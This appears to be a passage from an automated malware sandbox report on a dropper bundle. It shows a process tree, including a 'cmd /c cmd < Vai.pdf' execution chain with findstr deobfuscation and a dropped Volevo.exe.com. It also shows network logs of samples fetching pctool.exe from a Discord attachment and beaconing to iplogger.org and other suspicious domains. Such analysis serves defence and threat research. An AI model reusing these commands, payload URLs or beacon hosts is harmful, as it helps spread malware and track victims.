- Suspicious use of WriteProcessMemory
PID:4132
- C:\Windows\SysWOW64\dllhost.exe
  dllhost.exe
  2⤵
  PID:4700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c cmd < Vai.pdf
  2⤵
  PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    PID:2484
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^mtHoKMPFYDHibgXoaLvAaWsXCpDWIDAtGvzDsjSTgLhRLduwJPppYNJDMJFBoSWxeCBqVxQuTCkHIAkke$" Dal.pdf
      4⤵
      PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Volevo.exe.com
      Volevo.exe.com H
      4⤵
      Executes dropped EXE
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3960
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Volevo.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Volevo.exe.com H
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:696
  - - C:\Windows\SysWOW64\PING.EXE
      ping CLNYESRA -n 30
      4⤵
      Runs ping.exe
      PID:5004

C:\Users\Admin\AppData\Local\Temp\7zS8CA5E747\Wed01e6754f9438ea6c7.exe
Wed01e6754f9438ea6c7.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3024 -ip 3024
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3024 -ip 3024
1⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3024 -ip 3024
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3024 -ip 3024
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3024 -ip 3024
1⤵
PID:4100

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3024 -ip 3024
1⤵
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3024 -ip 3024
1⤵
PID:1560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3024 -ip 3024
1⤵
PID:3052

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1924

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:1520

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

69.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

69.31.126.40.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

88.156.103.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

hsiens.xyz

setup_install.exe

Remote address:

8.8.8.8:53

Request

hsiens.xyz

IN A

Response
DNS

cdn.discordapp.com

Wed01e6754f9438ea6c7.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.130.233
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:06 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=DrIN0D6.F9UhjR_YCSjWcax1rlYRKKrPSYuNTwPMMuA-1708892046-1.0-AVGnxXdt59MDxSTZ8GWWPJFlUViV3/k/IEinwfTIzPhFFCzMUxGb3JreE5g6Kd7mxavvGZgzA51uztk2Pdqagkc=; path=/; expires=Sun, 25-Feb-24 20:44:06 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n6IWIg5R6aL0Tu9D9VN1jtf1jxQnncuUPp0djnBvFYRlHMXZrQ%2Fn%2B%2Ff2kHBydNebmRdTMFPm8%2FxEU0KIcK4kBdHvMEaW9SxnpzowvhCEeGU9GTFIP51B7AAiBtY%2B0D8LVYmIOg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=hKPzo.nvz5jWoWxqn5TFAMr.IiJfRi3McS3SzG6impI-1708892046052-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29cd7aef106e9-LHR
alt-svc: h3=":443"; ma=86400
DNS

233.129.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.129.159.162.in-addr.arpa

IN PTR

Response
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
DNS

pcfixmy-download-96.xyz

dwm.exe

Remote address:

8.8.8.8:53

Request

pcfixmy-download-96.xyz

IN A

Response
DNS

iplogger.org

dwm.exe

Remote address:

8.8.8.8:53

Request

iplogger.org

IN A

Response

iplogger.org

IN A

104.21.4.208

iplogger.org

IN A

172.67.132.113
GET

https://iplogger.org/1SPHi7

dwm.exe

Remote address:

104.21.4.208:443

Request

GET /1SPHi7 HTTP/1.1
User-Agent: t817
Host: iplogger.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sun, 25 Feb 2024 20:14:09 GMT
Content-Type: image/png
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: 265134321502943035=1; expires=Tue, 25 Feb 2025 20:14:09 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
set-cookie: clhf03028ja=89.149.23.59; expires=Tue, 25 Feb 2025 20:14:09 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
memory: 0.4111328125
expires: Sun, 25 Feb 2024 20:14:09 +0000
Cache-Control: no-store, no-cache, must-revalidate
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BnDCP5WfTrDeKPEKhnDrP1ZqU7N0cTmfw6%2BlWqe0ae0XGS3MiGvFVqdud57QH4GQRWDnC0itVCf6OxA6kubPLwtsvwunk1OxsHrzfzvkTu%2BXMG%2FR7V%2BI4UDc%2ByVrN0s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 85b29ce9f99c0706-LHR
alt-svc: h3=":443"; ma=86400
DNS

208.4.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.4.21.104.in-addr.arpa

IN PTR

Response
GET

https://iplogger.org/1vpFz7

dwm.exe

Remote address:

104.21.4.208:443

Request

GET /1vpFz7 HTTP/1.1
Host: iplogger.org

Response

HTTP/1.1 200 OK

Date: Sun, 25 Feb 2024 20:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.35851287841796875
expires: Sun, 25 Feb 2024 20:14:09 +0000
strict-transport-security: max-age=31536000
x-frame-options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eSY3UgZekeUlzlMHDaFIq9Wr3rjx5ueEl4OG41VB9WyZuVupNV1vIN5JYP6KRH0XnvF%2B2xpRK2UaseG07sx8g16dF%2FhHK9xiYJapCQLQOfsXl%2Fk7ZMilyEuhX1dH5IY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 85b29ceba993369a-LHR
alt-svc: h3=":443"; ma=86400
DNS

live.goatgame.live

Wed018f781281d3.exe

Remote address:

8.8.8.8:53

Request

live.goatgame.live

IN A

Response

live.goatgame.live

IN A

3.141.96.53

live.goatgame.live

IN A

3.20.137.44
DNS

53.96.141.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.96.141.3.in-addr.arpa

IN PTR

Response

53.96.141.3.in-addr.arpa

IN PTR

ec2-3-141-96-53 us-east-2compute amazonawscom
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:11 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=gVWD.L9QCydb6Rsk.WPjn0BLUhSHN8PL8QH_vmMlR6M-1708892051-1.0-Afq5vqD0qV2vJS5FPzXh/kNp7ya9HeUu1SsbXK4Bl6oqLS3GDwH1vufiAmberluK2QsCc4U6XKEFAVyyvcYBomU=; path=/; expires=Sun, 25-Feb-24 20:44:11 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BFH5Eh7WDNEruY%2FQng9hNR1Z6BoWupF4Qlmrvs47ojp1vCUCPTZOe%2BQLNk96GlU2HIF9Y4rKmQ62McR9G9hEwfzyuNJNQT%2FglBRO48agVhZ0gMU7%2Fi6Wpwtr1CLtm0YeVx%2FGgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=Znjff6icrd315x7vFAPbxplRCAVayERR29X0aMu1CDA-1708892051329-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29cf8bf2079b9-LHR
alt-svc: h3=":443"; ma=86400
DNS

OpPyugYrdcCwUjnxmGFtZLvIhtD.OpPyugYrdcCwUjnxmGFtZLvIhtD

Volevo.exe.com

Remote address:

8.8.8.8:53

Request

OpPyugYrdcCwUjnxmGFtZLvIhtD.OpPyugYrdcCwUjnxmGFtZLvIhtD

IN A

Response
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:16 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=erChTE6HmuEXsCgTQTB5YcwqYcnh2Uamr273jzkFeQA-1708892056-1.0-AXdCpq0VErPj42yfQFhJp4EtoILxPiZF9Ww3bnzpL2aUe29jCrOUfWYyPKXk2n4vP4bVU91+F/Ir22dkyZYPqHw=; path=/; expires=Sun, 25-Feb-24 20:44:16 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BKBqdJVRdFzPrS7lSG%2BWn%2B4VOofT%2BJ2qHlWTHaRABXYnch6C%2B7BhctUpPjRcX5UKaRb2%2FCI%2Bb9DhZ1KGpPfkBIJBmf1JtTlSLHmo837rb3QjxROuFlVVyRsSs%2FQHBZE2XVR61Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=55Dk0viRSuTNL5k0mTpJ6ByndC4WDeRqd7YbHGGlSfE-1708892056455-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29d18b92971a2-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:23 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=rN7kyw3JkTAylgKNrCxtmjw6seF7MQrTlJmRkQdUNq8-1708892063-1.0-AXfL2goRL5qfEOCpFGavtiorez+oWmiC9hZWlE11sDp1ZCQDOXOnnQOagBi2rJ0OJooSfN6TGNrXqQNudk9oU10=; path=/; expires=Sun, 25-Feb-24 20:44:23 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SAby14JWaJ6Oqj69n5F4PLOLDLroXdG3n2YWtP4QCjFL5ZXv7jlMec1ta1Lovrww7RLV%2FlMVXZVzQxzLZgABBk1XX5Cd818R1pRBjg54oI%2BGf4o%2B6x%2Fg2Uh0%2BkZdzxBN1pn8tw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=fyAfNv0_z_OflnXNhqBWtYTU4yZ4Z5njDOORtxEutXI-1708892063704-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29d460b283d9a-LHR
alt-svc: h3=":443"; ma=86400
DNS

lenak513.tumblr.com

Wed016c6ddb9ad40722.exe

Remote address:

8.8.8.8:53

Request

lenak513.tumblr.com

IN A

Response

lenak513.tumblr.com

IN A

74.114.154.22

lenak513.tumblr.com

IN A

74.114.154.18
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
DNS

22.154.114.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.154.114.74.in-addr.arpa

IN PTR

Response
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:34 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=ZBpELU279BEd5JNUq7nCrIpAOQDIdDETB49z8hlVuVY-1708892074-1.0-AVnWLwDabknLP7n+Ssmkcl0b9fUP7DfSXLoF0eA94lUbBdGkHjLuxbj1+61UaFK1gS0iPcloKwyQ/sjRBpN8PmY=; path=/; expires=Sun, 25-Feb-24 20:44:34 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DC%2Bo1l2%2BG3zeDlvIkO3So3WaxtpzbNFZ2139SeK2V39ydYoUcL2XHKLjDR0QrnXCygizDEl3tsv85cxfoEoox70CRU9uVmnSBHhoBEf4hQtZXPdYv5dnWqmM3WMtXDfInWe6Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=a11Mx2GcNamtCFhUcsaE1JvFrJ4XDVJV9DXHVVretn0-1708892074155-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29d875f00dd7e-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:39 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=0a04Vj5OEzOkA.DVOyg_pdaB5SM14xIU3jB9Fa3TP44-1708892079-1.0-ASIvqmteNL0dmY0gBoHhJRTZBV9JSZq2hNd3hrj9jg8MEBAg+ShjmYGd+sXnxrahRSsgdV5QTyhIN3UCr0Y4Lcg=; path=/; expires=Sun, 25-Feb-24 20:44:39 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZVz7GNIWtYzVUEb1IEI5Q%2F6fCLa392sDTLeJ8HlDhEj8MDarFzcbdsRd%2FYiHqDb%2FMgTCKt8boyMcWxscmTW7cFWp5b5V5cUcp%2FGBwVCdV9pXKjvQkkTdVZy3rSx%2Fpt%2Frl2ncTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=Ll_2rWF7VHB4OhPKnPyxscWgV6bDOousNBDxW7pfcfw-1708892079238-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29da72a3e3699-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:44 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=4DHbMDIeQJ2fDT36nRZZPTwusIzTCBUbtWJWJvit0jU-1708892084-1.0-AbG+FSULMBJ4HhB8zT/4gP4pEfUxW2LYuZaWIPRicTmTPfNB41wIApmPNPOH3bWIsPrb59lw65KOTkB2ngEd6HE=; path=/; expires=Sun, 25-Feb-24 20:44:44 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B9smF0yB37V6lQBVFZ%2BSiPWf1tzK7ogKat0MDsTZJZL3XJbytgaFRSMYe9SFqOMrsQ5Y47zTHP54mBVyqb%2Fjw0uIDYOtPsYoDb%2F3x6xjq50S20RRtDsp%2BuBi9WSKcTL65vii%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=4IZzZslFTEb_XOaGbB8hb12jSbDvkvl_pCYHru4GR10-1708892084323-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29dc6e812652a-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
DNS

aucmoney.com

Remote address:

8.8.8.8:53

Request

aucmoney.com

IN A

Response
DNS

thegymmum.com

Remote address:

8.8.8.8:53

Request

thegymmum.com

IN A

Response
DNS

atvcampingtrips.com

Remote address:

8.8.8.8:53

Request

atvcampingtrips.com

IN A

Response
DNS

kuapakualaman.com

Remote address:

8.8.8.8:53

Request

kuapakualaman.com

IN A

Response
DNS

renatazarazua.com

Remote address:

8.8.8.8:53

Request

renatazarazua.com

IN A

Response
DNS

nasufmutlu.com

Remote address:

8.8.8.8:53

Request

nasufmutlu.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:49 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=n.qf5yfvFryyXFTbe3xStEJjdkYCafDwSX6GSUZfHHs-1708892089-1.0-AYBO4ZHgLIMrepalUbTyyiohQ87mnt94UUksOL/3TEMM0GhArpw4RO6le4d0ABC4uqUqPcbNsERtjiCjdTnhSfA=; path=/; expires=Sun, 25-Feb-24 20:44:49 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QmDrv%2F85Y10bZfXAfe6ZV2iSq20%2BYayNHIBghUW%2BQ35M9Uj6Gcka6PlwsSLs5EO7bDiOdrc%2BJDmfnez3MmSbGeppB8Pebo68RtDCcX0MR2ZFykOfK1J5nqdJKTJsqRe5ynPiew%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=GpLILcOxeC1Y.2cmKGzXRz3ADoWXwaOQl4G_snUP2sY-1708892089424-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29de6cd5c60dc-LHR
alt-svc: h3=":443"; ma=86400
DNS

wfsdragon.ru

Wed0187dd5121696b.exe

Remote address:

8.8.8.8:53

Request

wfsdragon.ru

IN A

Response

wfsdragon.ru

IN A

172.67.133.215

wfsdragon.ru

IN A

104.21.5.208
GET

http://wfsdragon.ru/api/setStats.php

Wed0187dd5121696b.exe

Remote address:

172.67.133.215:80

Request

GET /api/setStats.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: wfsdragon.ru

Response

HTTP/1.1 200 OK

Date: Sun, 25 Feb 2024 20:14:52 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R3Wj%2FRrUgQ9BpugO3heuNSzwQwaHTXc3nTOAJxQnGsPT4SBEVxZzOi4AbB6oWypDpRr2a%2FP4a9ZTFW4%2FT7NKqb45fJWGpuxZWOJYvHk%2FoI8%2BIpSg0OiZPFAbCCJ0m5o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 85b29df02cc877b1-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
DNS

215.133.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

215.133.67.172.in-addr.arpa

IN PTR

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:54 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=SemeboWABMw88ptFs3QsCWtMNjX1EM0nTsWVb7CxmP0-1708892094-1.0-AZFpolJ/a6miA1FxlwG18Q88zeQiJat+j3jC96+QITg+/04SgwStyO8F+p9o3doQYe3P7ZdlOIrup+eW5s9bO5g=; path=/; expires=Sun, 25-Feb-24 20:44:54 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B%2BPrSlKbCsxofDZtABrKmo4dkVk%2F7cgX555mzskj%2FmGdcA5t7Un7AhNu63r0cT9IhOeMCGOwWkUiIRxFz9DoT9Ev6jcNkrqPO%2BjRiNttQU8eOgr2J%2B3A5LAKO719PtQ6dHJXnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=vr_.FmJqHc237ZbY08TLY0KQkhkeX7CXxA1YiTIMXCI-1708892094521-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29e0699f7640f-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

IN A

Response
GET

https://cdn.discordapp.com/attachments/873244194234318850/877197019104571443/pctool.exe

Wed01e6754f9438ea6c7.exe

Remote address:

162.159.129.233:443

Request

GET /attachments/873244194234318850/877197019104571443/pctool.exe HTTP/1.1
Host: cdn.discordapp.com

Response

HTTP/1.1 403 Forbidden

Date: Sun, 25 Feb 2024 20:14:59 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=NTe_r3Bf51hhVBZgvqbiNeY..3HS5E6I2FFzg.xE1rs-1708892099-1.0-AV2kz6hehvsZ/wFDQ72lA1TnFbih/cLhzR9lf3i7H7EF3GICAxFcWCrpz0WwnLSbP0Ec1NKiM56bM+LuY1vaTrU=; path=/; expires=Sun, 25-Feb-24 20:44:59 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qv9nUPszOR4fCdgWaDzxJ%2BeUXEZPZdGed9OL0JSCdzrdbBTLUKmlBy3SuA7XDlo9r2C4RR1EqQU52Y0jcsibIc1tZ8IZLusdYi34%2FVd2HabCNvSfPtyowncW5QALDtKHv%2BYrqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=dpQjmjlJk5M2SXecTmSN.EvCeEPQqJNxQHDWnHM842I-1708892099610-0.0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 85b29e266bdd779d-LHR
alt-svc: h3=":443"; ma=86400
DNS

s.lletlee.com

Wed01b1b688489137a.exe

Remote address:

8.8.8.8:53

Request

s.lletlee.com

